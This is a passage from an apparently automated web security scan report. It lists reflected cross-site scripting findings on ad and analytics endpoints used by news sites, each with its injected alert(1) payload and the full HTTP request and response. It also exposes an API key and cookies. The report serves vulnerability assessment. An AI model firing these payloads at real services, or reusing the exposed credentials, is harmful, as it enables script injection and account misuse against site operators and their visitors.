GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fed8b5'%3balert(1)//13bb1e92c92 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:47 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?ed8b5';alert(1)//13bb1e92c92http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b9f9'%3balert(1)//ba9ef290c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b9f9';alert(1)//ba9ef290c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&2b9f9'%3balert(1)//ba9ef290c77=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 548
Date: Sun, 04 Sep 2011 00:45:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?&2b9f9';alert(1)//ba9ef290c77=1http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.11. http://api.bit.ly/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cc1c2<script>alert(1)</script>74bf979fd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURLcc1c2<script>alert(1)</script>74bf979fd&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:12 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "573ac502eb2353400a5c161b299b6031bb670f92"

processBitlyURLcc1c2<script>alert(1)</script>74bf979fd({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903": {"userHash": "rsX0BA", "shortKeywordUrl": "", "hash": "pwdflq",
...[SNIP]...

5.12. http://api.bit.ly/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 7e94d<script>alert(1)</script>9e18e1118a5 was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:14 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "2f364296de6d49e458eff08a4defecc36df64774"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5": {"userHash": "qLujX3", "shortKeywordUrl": "", "hash": "parItt", "shortCNAMEUrl": "http://reut.rs/qLujX3", "shortUrl": "http://reut.rs/qLujX3"}}, "statusCode": "OK"})

5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 9c917<script>alert(1)</script>7981b6f966 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966)

5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 2c114<script>alert(1)</script>431ab9e4b41 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=2c114<script>alert(1)</script>431ab9e4b41 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:58 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2c114<script>alert(1)</script>431ab9e4b41

5.15. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 632bc<a>7925c1cf403 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16108104765831958503_1315096982333&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903+632bc<a>7925c1cf403&appkey=prod.reuters.com&_=1315097065797 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16108104765831958503_1315096982333({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"632bc<a>7925c1cf403\" at 299" });

5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 7d745<script>alert(1)</script>52a1d786209 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=87d745<script>alert(1)</script>52a1d786209&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"87d745<script>alert(1)</script>52a1d786209", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload ab874<script>alert(1)</script>87274f504e7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096ab874<script>alert(1)</script>87274f504e7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096ab874<script>alert(1)</script>87274f504e7", c15:"", c16:"", r:""});



5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9dc8e<script>alert(1)</script>368b40879a7 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15=9dc8e<script>alert(1)</script>368b40879a7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"9dc8e<script>alert(1)</script>368b40879a7", c16:"", r:""});



5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1b71<script>alert(1)</script>27ada6e0b14 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113b1b71<script>alert(1)</script>27ada6e0b14&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113b1b71<script>alert(1)</script>27ada6e0b14", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 69029<script>alert(1)</script>f027bdb3f14 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=1369029<script>alert(1)</script>f027bdb3f14&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"1369029<script>alert(1)</script>f027bdb3f14", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload e3c2c<script>alert(1)</script>48cdf954b23 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473e3c2c<script>alert(1)</script>48cdf954b23&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473e3c2c<script>alert(1)</script>48cdf954b23", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload cfb0a<script>alert(1)</script>731425dd61f was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394cfb0a<script>alert(1)</script>731425dd61f&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394cfb0a<script>alert(1)</script>731425dd61f", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d842d<script>alert(1)</script>1190baab365 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

